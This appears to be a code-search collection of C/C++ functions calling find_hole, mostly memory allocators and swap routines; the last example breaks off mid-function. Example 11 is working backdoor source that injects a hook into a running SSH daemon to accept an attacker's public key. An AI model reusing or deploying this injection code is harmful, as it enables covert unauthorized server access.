Example No. 1
void mm_free(seg_t base)
{
    register struct malloc_head *mh = &memmap;
    register struct malloc_hole *m;

    m = find_hole(mh, base);
    if (!m) {

#ifdef CONFIG_SWAP

	m = find_hole(&swapmap, base);
	if (!m)
	    panic("mm corruption");
	mh = &swapmap;
	printk("mm_free(): from swap\n");

#else

	panic("mm corruption");

#endif

    }

    if ((m->flags & 3) != HOLE_USED)
	panic("double free");
    m->refcount--;
    if (!m->refcount) {
	m->flags = HOLE_FREE;
	sweep_holes(mh);
    }
}
Example No. 2
seg_t mm_dup(seg_t base)
{
    register struct malloc_hole *o, *m;
    size_t i;

    debug("MALLOC: mm_dup()\n");
    o = find_hole(&memmap, base);
    if (o->flags != HOLE_USED)
	panic("bad/swapped hole");

#ifdef CONFIG_SWAP

    while ((m = best_fit_hole(&memmap, o->extent)) == NULL) {
	seg_t s = swap_strategy(NULL);
	if (!s || swap_out(s) == -1)
	    return NULL;
    }

#else

    m = best_fit_hole(&memmap, o->extent);
    if (m == NULL)
	return NULL;

#endif

    split_hole(&memmap, m, o->extent);
    m->flags = HOLE_USED;
    m->refcount = 1;
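    /* o->extent is in 16-byte paragraphs; << 4 converts it to a byte count for fmemcpy(). */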
    i = (o->extent << 4);
    fmemcpy(m->page_base, 0, o->page_base, 0, (__u16) i);
    return m->page_base;
}
Example No. 3
MemPool_Handle MemPool_FixedArea::alloc_mem(Uint32 p_amount) {


	ERR_FAIL_COND_V(chunks_allocated==MAX_CHUNKS,MemPool_Handle());
	
	Uint32 size_to_alloc=p_amount;
	
	ChunkMapPos new_chunk_map_pos;
	
	if (find_hole(&new_chunk_map_pos, size_to_alloc)) {
		/* No hole could be found, try compacting mem */
		compact();
		/* Then search again */
		ERR_FAIL_COND_V(find_hole(&new_chunk_map_pos, size_to_alloc),MemPool_Handle()); // can't compact further or out of memory
	}
	
	ChunkMemPos new_chunk_mem_pos;
	
	ERR_FAIL_COND_V( get_free_chunk_struct(&new_chunk_mem_pos) , MemPool_Handle() );
	
	/* Shift the chunk map up to keep it ordered by position, making room for the new entry. */
	for (Sint32 i=chunks_allocated;i>new_chunk_map_pos;i--) {
		
		chunk_map[i]=chunk_map[i-1];
	}
	
	chunk_map[new_chunk_map_pos]=new_chunk_mem_pos;
	
	chunks_allocated++;
	
	MemChunk &chunk=mem_chunks[ chunk_map[ new_chunk_map_pos ] ];
	
	chunk.len=size_to_alloc;
	chunk.pos=(new_chunk_map_pos==0)?0:mem_chunks[ chunk_map[ new_chunk_map_pos-1 ] ].end(); //allocate either at the beginning or at the end of the previous chunk
	chunk.lock=0;
	chunk.check=check_count++;
	
	return MemPool_Handle(&chunk,chunk.check);
}
Example No. 4
static int swap_out(seg_t base)
{
    register struct task_struct *t;
    register struct malloc_hole *o = find_hole(&memmap, base);
    struct malloc_hole *so;
    int ct, blocks;

    /* We can hit disk this time. Allocate a hole in 1K increments */
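    /* o->extent is in 16-byte paragraphs; 64 paragraphs make 1 KiB, so round up and shift right by 6. */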
    blocks = (o->extent + 0x3F) >> 6;
    so = best_fit_hole(&swapmap, blocks);
    if (so == NULL) {
	/* No free swap */
	return -1;
    }
    split_hole(&swapmap, so, blocks);
    so->flags = HOLE_USED;
    so->refcount = o->refcount;

    for_each_task(t) {
	int c = t->mm.flags;
	if (t->mm.cseg == base && !(c & CS_SWAP)) {
	    t->mm.cseg = so->page_base;
	    t->mm.flags |= CS_SWAP;
	    debug2("MALLOC: swaping out code of pid %d blocks %d\n",
		   t->pid, blocks);
	}
	if (t->mm.dseg == base && !(c & DS_SWAP)) {
	    t->mm.dseg = so->page_base;
	    t->mm.flags |= DS_SWAP;
	    debug2("MALLOC: swaping out data of pid %d blocks %d\n",
		   t->pid, blocks);
	}
    }

    /* Now write the segment out */
    for (ct = 0; ct < blocks; ct++) {
	swap_buf.b_blocknr = so->page_base + ct;
	swap_buf.b_dev = swap_dev;
	swap_buf.b_lock = 0;
	swap_buf.b_dirty = 1;
	swap_buf.b_seg = o->page_base;
	swap_buf.b_data = ct << 10;
	ll_rw_blk(WRITE, &swap_buf);
	wait_on_buffer(&swap_buf);
    }
    o->flags = HOLE_FREE;
    sweep_holes(&memmap);

    return 1;
}
Example No. 5
/* Increase refcount */
seg_t mm_realloc(seg_t base)
{
    register struct malloc_hole *m;

#ifdef CONFIG_SWAP

    base = validate_address(base);

#endif

    m = find_hole(&memmap, base);
    m->refcount++;

    return m->page_base;
}
Example No. 6
/*
 * Resize a hole
 */
struct malloc_hole *mm_resize(struct malloc_hole *m, segext_t pages)
{
    register struct malloc_hole *next;
    register segext_t ext;
    seg_t base;
    if(m->extent >= pages){
        /* for now don't reduce holes */           
        return m;
    } 
    
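    /* Try to grow in place by taking pages from the adjacent hole when it is free and large enough. */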
    next = m->next;
    ext = pages - m->extent;
    if(next->flags == HOLE_FREE && next->extent >= ext){    
        m->extent += ext;
        next->extent -= ext;
        next->page_base += ext;
        if(next->extent == 0){
            next->flags = HOLE_SPARE;
            m->next = next->next;
        }
        return m;
    }

#ifdef CONFIG_ADVANCED_MM

    base = mm_alloc(pages);
    if(!base){
        return NULL; /* Out of luck */    
    }
    fmemcpy(base, 0, m->page_base, 0, (__u16)(m->extent << 4));
    next = find_hole(&memmap, base);
    next->refcount = m->refcount;
    m->flags = HOLE_FREE;
    sweep_holes(&memmap);
    
    return next;

#else

    return NULL;

#endif

}
Example No. 7
int sys_brk(__pptr len)
{
    register __ptask currentp = current;

    if (len < currentp->t_enddata)
        return -ENOMEM;
        
    if (currentp->t_begstack > currentp->t_endbrk)
        if(len > currentp->t_endseg - 0x1000)
            return -ENOMEM;

#ifdef CONFIG_EXEC_ELKS
    if(len > currentp->t_endseg){
        /* Resize time */
        register struct malloc_hole *h;
        
        h = find_hole(&memmap, currentp->mm.dseg);    
        
        h = mm_resize(h, (len + 15) >> 4);
        if(!h){
            return -ENOMEM;
        }
        if(h->refcount != 1){   
            panic("Relocated shared hole");
        }
        
        currentp->mm.dseg = h->page_base;
        currentp->t_regs.ds = h->page_base;
        currentp->t_regs.ss = h->page_base;
        currentp->t_endseg = len;
    }
#endif
    currentp->t_endbrk = len;

    return 0;
}
Example No. 8
PoolAllocator::ID PoolAllocator::alloc(int p_size) {

	ERR_FAIL_COND_V(p_size < 1, POOL_ALLOCATOR_INVALID_ID);
#ifdef DEBUG_ENABLED
	if (p_size > free_mem) OS::get_singleton()->debug_break();
#endif
	ERR_FAIL_COND_V(p_size > free_mem, POOL_ALLOCATOR_INVALID_ID);

	mt_lock();

	if (entry_count == entry_max) {
		mt_unlock();
		ERR_PRINT("entry_count==entry_max");
		return POOL_ALLOCATOR_INVALID_ID;
	}

	int size_to_alloc = aligned(p_size);

	EntryIndicesPos new_entry_indices_pos;

	if (!find_hole(&new_entry_indices_pos, size_to_alloc)) {
		/* No hole could be found, try compacting mem */
		compact();
		/* Then search again */

		if (!find_hole(&new_entry_indices_pos, size_to_alloc)) {

			mt_unlock();
			ERR_PRINT("memory can't be compacted further");
			return POOL_ALLOCATOR_INVALID_ID;
		}
	}

	EntryArrayPos new_entry_array_pos;

	bool found_free_entry = get_free_entry(&new_entry_array_pos);

	if (!found_free_entry) {
		mt_unlock();
		ERR_FAIL_COND_V(!found_free_entry, POOL_ALLOCATOR_INVALID_ID);
	}

	/* move all entry indices up, make room for this one */
	for (int i = entry_count; i > new_entry_indices_pos; i--) {

		entry_indices[i] = entry_indices[i - 1];
	}

	entry_indices[new_entry_indices_pos] = new_entry_array_pos;

	entry_count++;

	Entry &entry = entry_array[entry_indices[new_entry_indices_pos]];

	entry.len = p_size;
	entry.pos = (new_entry_indices_pos == 0) ? 0 : entry_end(entry_array[entry_indices[new_entry_indices_pos - 1]]); //alloc either at the beginning or at the end of the previous entry
	entry.lock = 0;
	entry.check = (check_count++) & CHECK_MASK;
	free_mem -= size_to_alloc;
	if (free_mem < free_mem_peak)
		free_mem_peak = free_mem;

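	/* Pack the handle: entry array position in the upper bits, check value in the lower CHECK_BITS. */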
	ID retval = (entry_indices[new_entry_indices_pos] << CHECK_BITS) | entry.check;
	mt_unlock();

	//ERR_FAIL_COND_V( (uintptr_t)get(retval)%align != 0, retval );

	return retval;
}
Example No. 9
static int init(void)
{
#if HWLOC_API_VERSION >= 0x20000
    int rc;
    bool space_available = false;
    uint64_t amount_space_avail = 0;

    /* ensure we have the topology */
    if (OPAL_SUCCESS != (rc = opal_hwloc_base_get_topology())) {
        return rc;
    }

    if (VM_HOLE_NONE == mca_rtc_hwloc_component.kind) {
        return ORTE_SUCCESS;
    }

    /* get the size of the topology shared memory segment */
    if (0 != hwloc_shmem_topology_get_length(opal_hwloc_topology, &shmemsize, 0)) {
        opal_output_verbose(2, orte_rtc_base_framework.framework_output,
                            "%s hwloc topology shmem not available",
                            ORTE_NAME_PRINT(ORTE_PROC_MY_NAME));
        return ORTE_SUCCESS;
    }

    if (ORTE_SUCCESS != (rc = find_hole(mca_rtc_hwloc_component.kind,
                                        &shmemaddr, shmemsize))) {
        /* we couldn't find a hole, so don't use the shmem support */
        if (4 < opal_output_get_verbosity(orte_rtc_base_framework.framework_output)) {
            FILE *file = fopen("/proc/self/maps", "r");
            if (file) {
                char line[256];
                opal_output(0, "%s Dumping /proc/self/maps",
                            ORTE_NAME_PRINT(ORTE_PROC_MY_NAME));
                while (fgets(line, sizeof(line), file) != NULL) {
                    char *end = strchr(line, '\n');
                    if (end) {
                       *end = '\0';
                    }
                    opal_output(0, "%s", line);
                }
                fclose(file);
            }
        }
        return ORTE_SUCCESS;
    }
    /* create the shmem file in our session dir so it
     * will automatically get cleaned up */
    asprintf(&shmemfile, "%s/hwloc.sm", orte_process_info.jobfam_session_dir);
    /* let's make sure we have enough space for the backing file */
    if (OPAL_SUCCESS != (rc = enough_space(shmemfile, shmemsize,
                                           &amount_space_avail,
                                           &space_available))) {
        opal_output_verbose(2, orte_rtc_base_framework.framework_output,
                            "%s an error occurred while determining "
                            "whether or not %s could be created for topo shmem.",
                            ORTE_NAME_PRINT(ORTE_PROC_MY_NAME), shmemfile);
        free(shmemfile);
        shmemfile = NULL;
        return ORTE_SUCCESS;
    }
    if (!space_available) {
        if (1 < opal_output_get_verbosity(orte_rtc_base_framework.framework_output)) {
            orte_show_help("help-orte-rtc-hwloc.txt", "target full", true,
                           shmemfile, orte_process_info.nodename,
                           (unsigned long)shmemsize,
                           (unsigned long long)amount_space_avail);
        }
        free(shmemfile);
        shmemfile = NULL;
        return ORTE_SUCCESS;
    }
    /* enough space is available, so create the segment */
    if (-1 == (shmemfd = open(shmemfile, O_CREAT | O_RDWR, 0600))) {
        int err = errno;
        if (1 < opal_output_get_verbosity(orte_rtc_base_framework.framework_output)) {
            orte_show_help("help-orte-rtc-hwloc.txt", "sys call fail", true,
                           orte_process_info.nodename,
                           "open(2)", "", strerror(err), err);
        }
        free(shmemfile);
        shmemfile = NULL;
        return ORTE_SUCCESS;
    }
    /* ensure nobody inherits this fd */
    opal_fd_set_cloexec(shmemfd);
    /* populate the shmem segment with the topology */
    if (0 != (rc = hwloc_shmem_topology_write(opal_hwloc_topology, shmemfd, 0,
                                              (void*)shmemaddr, shmemsize, 0))) {
        opal_output_verbose(2, orte_rtc_base_framework.framework_output,
                            "%s an error occurred while writing topology to %s",
                            ORTE_NAME_PRINT(ORTE_PROC_MY_NAME), shmemfile);
        unlink(shmemfile);
        free(shmemfile);
        shmemfile = NULL;
        close(shmemfd);
        shmemfd = -1;
        return ORTE_SUCCESS;
    }
#endif

    return ORTE_SUCCESS;
}
Example No. 10
elemptr symmodel::get_model_widx( const vector<string>& parsed, const vector<size_t>& idx, const vector<elemptr>& trace )
  {
    //I start with it already parsed.
    //If parsed.size() == 0, I simply return this (with an index?)
    //The empty string indicates "this" model? No, when I parse it, I need to sep it, so an empty, will return in a zero-parse, of size zero, or nothing?
    //Either way, would result in same, so return ;)
    if( parsed.size() == 0 || parsed[0].compare("") == 0 )
      {
	fprintf(stdout, "FOUND MODEL! [%s]\n", buildpath().c_str() );
	elemptr t = elemptr( shared_from_this(), idx );
	return t;
      }
    else
      {
	fprintf(stdout, "Model [%s], attempting to find model name [%s] widx (note, trace size is [%lu])\n", buildpath().c_str(), CAT(parsed, "/").c_str(), trace.size());
      }
    //This is the next model I will go into
    string submodel = parsed[0];
    vector<string> remainder( parsed.begin()+1, parsed.end() ); //same as copying parsed and erasing its first element
    
    //REV: This is where I should iterate up the tree! This is the issue.
    vector<size_t> mlocs = find_model( submodel );
    vector<size_t> hlocs = find_hole( submodel );
    
    //At this point, we are finding the hole etc. normally.
    if( mlocs.size() >= 1 )
      {
	if( mlocs.size() > 1 )
	  {
	    fprintf(stderr, "WTF found more than one in getmodelwidx\n");
	    exit(1);
	  }
	
	size_t mloc = mlocs[0];
	//add model to trace? I guess? It is a submodel, so it is not necessary I guess? But it helps it find submodels I guess? Could this cause a problem?

	fprintf(stdout, "Model [%s], going through submodel [%s] to find [%s]\n", buildpath().c_str(), models[mloc]->localname.c_str(), CAT(remainder, "/").c_str() );
	
	std::shared_ptr<symmodel> nextmodel = models[mloc];

	//Don't add to trace because if same model, parent will cause infinite loop in combin with trace.
	//However
	//Problem is if I go through a hole, and the hole is the same model, that is the main problem
	vector<elemptr> newtrace = trace;
	//size_t idx_in_submodel = idx; //no change, b/c submodel.
	vector<size_t> idx_in_submodel = idx; //no change, b/c submodel.
	//newtrace.push_back( elemptr( shared_from_this(), idx ) );
	
	return nextmodel->get_model_widx( remainder, idx_in_submodel, newtrace );
      }
    else if( hlocs.size() >= 1 )
      {
	if( hlocs.size() > 1)
	  {
	    fprintf(stderr, "WTF more than one HOLE found in getmodelwidx\n");
	    exit(1);
	  }
	

	size_t hloc = hlocs[0];
	fprintf(stdout, "Model [%s], going through hole [%s] to find [%s]\n", buildpath().c_str(), holes[hloc].name.c_str(), CAT(remainder, "/").c_str());
	if( holes[ hloc ].members.size() != 1 )
	  {
	    fprintf(stderr, "ERROR in get_model_widx, getting [%s] from HOLE, but hole [%s] has size [%lu], but it should be 1\n", submodel.c_str(), holes[hloc].name.c_str(), holes[hloc].members.size() );
	    exit(1);
	  }

	//REV: so in the case it does not exist yet, we have a problem?
	std::shared_ptr<symmodel> nextmodel = holes[hloc].members[0];
	
	if( check_same_toplevel_model( nextmodel ) )
	  {
	    //Dont add to trace because its same model so infinite loop with going to parent.x
	    vector<elemptr> newtrace = trace;
	    //size_t idx_in_submodel = idx; //no change, b/c submodel.
	    vector<size_t> idx_in_submodel = idx; //no change, b/c submodel.
	    //newtrace.push_back( elemptr( shared_from_this(), idx ) );
	    
	    return nextmodel->get_model_widx( remainder, idx_in_submodel, newtrace );
	  }
	else //not same toplevel model
	  {
	    //I NEED TO GO THROUGH A CORRESPONDENCE

	    fprintf(stdout, "REV: about to go through a corresp to get a non-same model thing through a hole...\n");
	    //std::shared_ptr<corresp> mycorresp;
	    auto mycorresp  = getcorresp( nextmodel );
	    if( !mycorresp )
	      {
		fprintf(stderr, "REV: getcorresp in get_model_widx, failed, no such corresp exists between [%s] and [%s]\n", buildpath().c_str(), nextmodel->buildpath().c_str());
		exit(1);
	      }
	    
	    
	    //REV; SANITY, if corresp not allocated yet, just return 0.
	    //size_t idx_in_submodel = 0;
	    vector<size_t> idx_in_submodel(1,0);
	    
	    //REV; Don't check this here, check this in the corresp struct? I.e. return dummy data if it is not existing yet (or exit?)
	    if(mycorresp->isinit())
	      {
		fprintf(stdout, "Corresp is INIT!!!! Will attempt a GETALL...\n");
		//REV: TODO HERE, just return it directly, with new IDX_IN_SUBMODEL ;0
		//REV: this is it!!! This is where I 
		vector<size_t> sanity = mycorresp->getall( idx );
		
		fprintf(stdout, "Attempted to GETALL from the corresp!\n");
		/*if( sanity.size() != 1 )
		  {
		  fprintf(stderr, "SANITY check for corresp during access failed! Expected corresp for idx [%lu] of model [%s] to have only 1 corresponding element in model [%s], but it had [%lu]\n", idx, buildpath().c_str(), nextmodel->buildpath().c_str(), sanity.size() );
		  exit(1);
		  }
		  size_t idx_in_submodel = sanity[0]; //no change, b/c submodel.
		*/

		idx_in_submodel = sanity;
	      }
	    
	    vector<elemptr> newtrace = trace;
	    newtrace.push_back( elemptr( shared_from_this(), idx ) );

	    fprintf(stdout, "About to get next model with idx...\n");
	    auto toret = nextmodel->get_model_widx( remainder, idx_in_submodel, newtrace );
	    fprintf(stdout, "FINISHED About to get next model with idx...\n");
	    return toret;
	  }
      } //end if not found in HOLES (or submodels)
    else
      {
	fprintf(stdout, "Model [%s], walking up to parent [%s] to find [%s]\n", buildpath().c_str(), parent->localname.c_str(), CAT(parsed, "/").c_str());
	//Else, try to bubble up to ROOT.
	if( parent && (parent->parent) )
	  {
	    std::shared_ptr<symmodel> nextmodel = parent;
	    
	    vector<elemptr> newtrace = trace;
	    //size_t idx_in_submodel = idx; //no change, b/c submodel.
	    vector<size_t> idx_in_submodel = idx; //no change, b/c submodel.
	    //newtrace.push_back( elemptr( shared_from_this(), idx ) );
	    
	    return nextmodel->get_model_widx( parsed, idx_in_submodel, newtrace );
	  }
	else if(  parent && !(parent->parent) )
	  {
	    //Couldn't find it! Return empty elemptr...bad.
	    elemptr ep;
	    return ep;
	  }
	else
	  {
	    fprintf(stderr, "REV; this should never happen weird, Neither parent nor parent->parent? In searching for model with idx. Exit\n");
	    if( parent )
	      {
		fprintf( stderr, "Parent of me [%s] exists and is [%s]\n", buildpath().c_str(), parent->buildpath().c_str() );
	      }
	    else
	      {
		fprintf( stderr, "Parent does not exist... (note current model is [%s])!\n", buildpath().c_str() );
	      }
	    exit(1);
	  }
      } //couldn't find in "else" (i.e. not in this model, so try bubbling up parents)
    
    if(trace.size() == 0)
      {
	fprintf(stderr, "Trace size zero. This should never happen (should have been caught above)\n");
	exit(1);
      }

    //REV: Did I mess something up? First it should check through all guys directly to see if it is same model? I.e. if target model matches b/c we can use that idx.
    fprintf(stdout, "Couldn't find model [%s] in previous model trace [%s], so moving to next! (trace size is [%lu])\n", CAT(parsed,"/").c_str(), buildpath().c_str(), trace.size() );
    
    //Move back model and try again?
    vector<elemptr> newtrace = trace;
    //size_t idx_in_submodel = newtrace[ newtrace.size() - 1].idx; //end of trace.
    vector<size_t> idx_in_submodel = newtrace[ newtrace.size() - 1].idx; //end of trace.
    std::shared_ptr<symmodel> nextmodel = newtrace[ newtrace.size() - 1].model;
    newtrace.pop_back();

    fprintf(stdout, "Will now try to run with new trace size [%lu]\n", newtrace.size() );
    return nextmodel->get_model_widx( parsed, idx_in_submodel, newtrace );
    
  } //end get_model_widx
Example No. 11
void backdoor_pubkey_install(inject_ctx *ctx, char *pubkey) {
	signature signatures[]={
		{ 0x1, "key_allowed", "trying public key file %s", 0 },
		{ 0x2, "restore_uid", "restore_uid: %u/%u"       , 0 },
		{ 0x3, "key_new"    , "key_new: RSA_new failed"  , 0 }, 
		{ 0x4, "key_read"   , "key_read: type mismatch: ", 0 }, 
		{ 0x5, "key_free"   , "key_free: "               , 0 }, 
	};

	u8 *evil_bin;
	int i;
	u32 callcache_total, num_key_allowed2_calls=0;
	char line[255];
	callcache_entry *callcache, *entry;
	u64 user_key_allowed2_calls[MAX_KEY_ALLOWED_CALLS];
	u64 diff=0, hole_addr=0, *import_table;

	evil_bin = malloc(hook_pubkey_bin_len);
	import_table = (u64*)(evil_bin + 8);

	memcpy(evil_bin, hook_pubkey_bin, hook_pubkey_bin_len);

	import_table[0] = ctx->config_addr;

	for(i = 0; i < sizeof(signatures) / sizeof(signature); i++) {
		if (ctx->uses_new_key_system == 0 || i < 2) {
			signatures[i].addr = sub_by_debugstr(ctx, signatures[i].str);
		} else {
			u64 f_dsa_new, f_bn_new, p_dsa_new, p_bn_new, callpair, callpair_b, p_rsa_free, p_dsa_free;

			switch(i) {
				case 2: // key_new
					f_dsa_new = resolve_reloc(
						ctx->rela, ctx->rela_sz, ctx->dynsym, ctx->dynsym_sz, (char*)ctx->dynstr, "DSA_new"
					);

					f_bn_new = resolve_reloc(
						ctx->rela, ctx->rela_sz, ctx->dynsym, ctx->dynsym_sz, (char*)ctx->dynstr, "BN_new"
					);

					info("DSA_new@got = 0x%lx", f_dsa_new);
					info("BN_new@got = 0x%lx", f_bn_new);

					p_dsa_new = find_plt_entry(ctx, ctx->elf_base + f_dsa_new);
					p_bn_new = find_plt_entry(ctx, ctx->elf_base + f_bn_new);

					info("DSA_new@plt = 0x%lx", p_dsa_new);
					info("BN_new@plt = 0x%lx", p_bn_new);

					callpair = find_callpair(p_dsa_new, p_bn_new);

					info("yo we got a callpair for (DSA_new, BN_new) -> 0x%lx", callpair);

					signatures[i].addr = find_entrypoint(callpair);
				break;

				case 3: // key_read
					signatures[i].addr = prevcall_by_debugstr(ctx, "user_key_allowed: advance: ");
				break;

				case 4: // key_free
					p_rsa_free = find_plt_entry(ctx, ctx->elf_base + resolve_reloc(
						ctx->rela, ctx->rela_sz, ctx->dynsym, ctx->dynsym_sz, (char*)ctx->dynstr, "RSA_free"
					));

					p_dsa_free = find_plt_entry(ctx, ctx->elf_base + resolve_reloc(
						ctx->rela, ctx->rela_sz, ctx->dynsym, ctx->dynsym_sz, (char*)ctx->dynstr, "DSA_free"
					));

					info("RSA_free@plt = 0x%lx", p_rsa_free);
					info("DSA_free@plt = 0x%lx", p_dsa_free);

					callpair_b = find_callpair(p_rsa_free, p_dsa_free);

					if(callpair_b == 0) {
						callpair_b = find_callpair(p_dsa_free, p_rsa_free);
					}

					if(callpair_b != 0) {
						info("found callpair @ 0x%lx .. finding entrypoint..", callpair_b);

						signatures[i].addr = find_entrypoint_inner(callpair_b, 3);
					} else {
						error("could not find valid callpair to derive key_free()");
					}
				break;

				default:
					error("WTF just happened!");
				break;
			}
		}

		if (signatures[i].addr == 0) {
			error("%s not found :(\n", signatures[i].name);
		}

		sprintf(line, 
			"%s\t\t= \x1b[37m0x%lx",
			signatures[i].name, signatures[i].addr - ctx->elf_base
		);

		import_table[ signatures[i].import_id ] = signatures[i].addr;

		sprintf(
			line+strlen(line), 
			" .. patched at offset 0x%lx in import table!", 
			(signatures[i].import_id*8) & 0xffff
		);

		info(line);
	}

	u64 f_BN_cmp = resolve_reloc(ctx->rela, ctx->rela_sz, ctx->dynsym, ctx->dynsym_sz, (char*)ctx->dynstr, "BN_cmp");
	info("BN_cmp@got = 0x%lx", f_BN_cmp);
	u64 l_BN_cmp;
	_peek(ctx->pid, ctx->elf_base + f_BN_cmp, &l_BN_cmp, 8);
	info("BN_cmp@lib = 0x%lx", l_BN_cmp);

	import_table[6] = l_BN_cmp;

	callcache = get_callcache();
	callcache_total = get_callcachetotal();

	for(i=0; i<callcache_total; i++) {
		entry = &callcache[i];
		if (entry->dest == signatures[0].addr && entry->type == CALLCACHE_TYPE_CALL) {
			info("found a 'call user_key_allowed' @ 0x%lx", entry->addr);
			user_key_allowed2_calls[num_key_allowed2_calls] = entry->addr;
			num_key_allowed2_calls++;
		}
	}

	if (num_key_allowed2_calls == 0)
		error("no call to user_key_allowed2 found :(");

	hole_addr = find_hole(ctx, user_key_allowed2_calls[0], 0x1000);
	
	if (hole_addr == 0) {
		error("unable to find neighborly hole.");
	}

	info("found usable hole @ 0x%lx", hole_addr);

	info2("entering critical phase");

	_mmap(
		ctx, (void*)hole_addr, 0x1000,
		PROT_READ| PROT_WRITE | PROT_EXEC,
		MAP_ANONYMOUS | MAP_SHARED | MAP_FIXED,
		0, 0
	);

	for(i=0; i<num_key_allowed2_calls; i++) {
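		/* rel32 operand for the 5-byte E8 call: target minus (address of the call + 5), modulo 2^32. */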
		diff = 0x100000000-(user_key_allowed2_calls[i]-hole_addr)-5;

		info(
			"building a bridge [0x%lx->0x%lx] .. opcode = [E8 %02X %02X %02X %02X]",
			user_key_allowed2_calls[i], hole_addr,
			diff & 0xff, (diff>>8)&0xff, (diff>>16)&0xff, (diff>>24)&0xff
		);

		_poke(ctx->pid, user_key_allowed2_calls[i]+1, &diff, 4);
	}

	_poke(ctx->pid, hole_addr, evil_bin, hook_pubkey_bin_len);

	for(i=0; i<hook_pubkey_bin_len; i++) {
		if (memcmp(evil_bin+i, "\xaa\xbb\xcc\xdd", 4) == 0) {
			info("inserting pubkey at offset %x in payload", i);
			_poke(ctx->pid, hole_addr+i, pubkey, strlen(pubkey));
		}
	}

	info("poked evil_bin to 0x%lx.", hole_addr);
}
Example No. 12
/**
 * Allocate a block of memory
 *
 * @param sz size of the required block
 * @returns pointer to block
 */
void *kmalloc(u32 sz)
{
	kerror(ERR_DETAIL, "Allocating %d bytes of memory", sz);

	// We don't want two processes using the same memory block!
	lock(&alloc_lock);

	// Find the smallest memory block that we can use
	u32 idx = find_hole(sz);

	// Couldn't find one...
	if(idx == 0xFFFFFFFF)
	{
		unlock(&alloc_lock);
		return 0;
	}

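	// find_hole() packs the allocation block number in the high 16 bits and the slot index in the low 16 bits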
	int block = idx >> 16;
	int index = idx & 0xFFFF;

	if(empty_slots(block) == 4) // Get ready ahead of time
	{
		u32 asz = ALLOC_BLOCK * sizeof(struct alcent);

		u32 idx = find_hole(asz);
		if(idx == 0xFFFFFFFF) kpanic("Could not create another allocation block!");

		int block = idx >> 16;
		int index = idx & 0xFFFF;

		if(allocs[block][index].size == asz)
		{
			allocs[block][index].used = 1;
			allocs[get_free_block()] = (struct alcent *)allocs[block][index].addr;
		}
		else
		{
			allocs[block][index].size -= asz;
			struct alcent ae = { .valid = 1, .used = 1, .addr = allocs[block][index].addr, .size = asz };
			allocs[block][index].addr += asz;
			add_alloc(&ae);
			allocs[get_free_block()] = (struct alcent *)ae.addr;
		}
	}

	// If the previous block of code was used, we may have to reinitialize these
	idx = find_hole(sz);
	if(idx == 0xFFFFFFFF)
	{
		unlock(&alloc_lock);
		return 0;
	}
	block = idx >> 16;
	index = idx & 0xFFFF;


	if(allocs[block][index].size == sz)
	{
		allocs[block][index].used = 1;
		unlock(&alloc_lock);
		kerror(ERR_DETAIL, "  -> %08X W", allocs[block][index].addr);
		return (void *)allocs[block][index].addr;
	}

	allocs[block][index].size -= sz; // We are using part of this block

	struct alcent ae = { .valid = 1, .used = 1, .addr = allocs[block][index].addr, .size = sz };

	allocs[block][index].addr += sz; // We don't want anything else using the allocated memory

	add_alloc(&ae); // We will just assume this worked, the worst that could happen is we can't `free` it (FIXME)

	// Let other processes allocate memory
	unlock(&alloc_lock);

	kerror(ERR_DETAIL, "  -> %08X P", ae.addr);
	return (void *)ae.addr;
}

/**
 * Free an allocated block of memory
 *
 * @param ptr pointer to the previously allocated memory block
 */
void kfree(void *ptr)
{
	kerror(ERR_DETAIL, "Freeing %08X", ptr);

	lock(&alloc_lock);

	int i, j = 0;

	// Find the corresponding memory block
	for(; j < ALLOC_BLOCKS; j++)
	{
		if(!allocs[j]) continue;
		for(i = 0; i < ALLOC_BLOCK; i++)
			if(allocs[j][i].valid) // Is it valid?
				if(allocs[j][i].addr == (u32)ptr) // Is it the correct block?
					rm_alloc(j, i); // Free it!
	}

	unlock(&alloc_lock);
}
Example No. 13
static int swap_in(seg_t base, int chint)
{
    register struct malloc_hole *o;
    struct malloc_hole *so;
    int ct, blocks;
    register struct task_struct *t;

    so = find_hole(&swapmap, base);
    /* Find memory for this segment */
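    /* so->extent is in 1 KiB swap blocks; << 6 converts it back to 16-byte paragraphs. */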
    o = best_fit_hole(&memmap, so->extent << 6);
    if (o == NULL)
	return -1;

    /* Now read the segment in */
    split_hole(&memmap, o, so->extent << 6);
    o->flags = HOLE_USED;
    o->refcount = so->refcount;

    blocks = so->extent;

    for (ct = 0; ct < blocks; ct++) {
	swap_buf.b_blocknr = so->page_base + ct;
	swap_buf.b_dev = swap_dev;
	swap_buf.b_lock = 0;
	swap_buf.b_dirty = 0;
	swap_buf.b_uptodate = 0;
	swap_buf.b_seg = o->page_base;
	swap_buf.b_data = ct << 10;

	ll_rw_blk(READ, &swap_buf);
	wait_on_buffer(&swap_buf);
    }

    /*
     *      Update the memory management tables
     */
    for_each_task(t) {
	int c = t->mm.flags;
	if (t->mm.cseg == base && c & CS_SWAP) {
	    debug2("MALLOC: swapping in code of pid %d seg %x\n",
		   t->pid, t->mm.cseg);
	    t->mm.cseg = o->page_base;
	    t->mm.flags &= ~CS_SWAP;
	}
	if (t->mm.dseg == base && c & DS_SWAP) {
	    debug2("MALLOC: swapping in data of pid %d seg %x\n",
		   t->pid, t->mm.dseg);
	    t->mm.dseg = o->page_base;
	    t->mm.flags &= ~DS_SWAP;
	}
	if (c && !t->mm.flags) {
	    t->t_regs.cs = t->mm.cseg;
	    t->t_regs.ds = t->mm.dseg;
	    t->t_regs.ss = t->mm.dseg;

	    put_ustack(t, 2, t->t_regs.cs);
	}
    }

    /* Our equivalent of the Linux swap cache. Try and avoid writing CS
     * back. Need to kill segments on last exit for this to work, and
     * keep a table - TODO
     */
#if 0
    if (chint==0)
#endif
    {
	so->refcount = 0;
	so->flags = HOLE_FREE;
	sweep_holes(&swapmap);
    }

    return 0;
}
Example No. 14
void *alloc(uint32_t size, uint8_t page_align, heap_t *heap)
{
	uint32_t new_size = size + sizeof(header_t) + sizeof(footer_t);
	int32_t iterator = find_hole(new_size, page_align, heap);
	
	if (iterator == (int32_t) -1) {
		uint32_t old_length = heap->end_address - heap->start_address;
		uint32_t old_end_address = heap->end_address;

		expand(old_length+new_size, heap);
		uint32_t new_length = heap->end_address-heap->start_address;

		iterator = 0;

		int32_t idx = -1;
		uint32_t value = 0x0;
		while (iterator < (int32_t) heap->index.size)
		{
		    uint32_t tmp = (uint32_t)lookup_list(iterator, &heap->index);
		    if (tmp > value)
		    {
			 value = tmp;
			 idx = iterator;
		    }
		    iterator++;
		}

		if (idx == -1)
		{
		    header_t *header = (header_t *)old_end_address;
		    header->magic = HEAP_MAGIC;
		    header->size = new_length - old_length;
		    header->is_hole = 1;
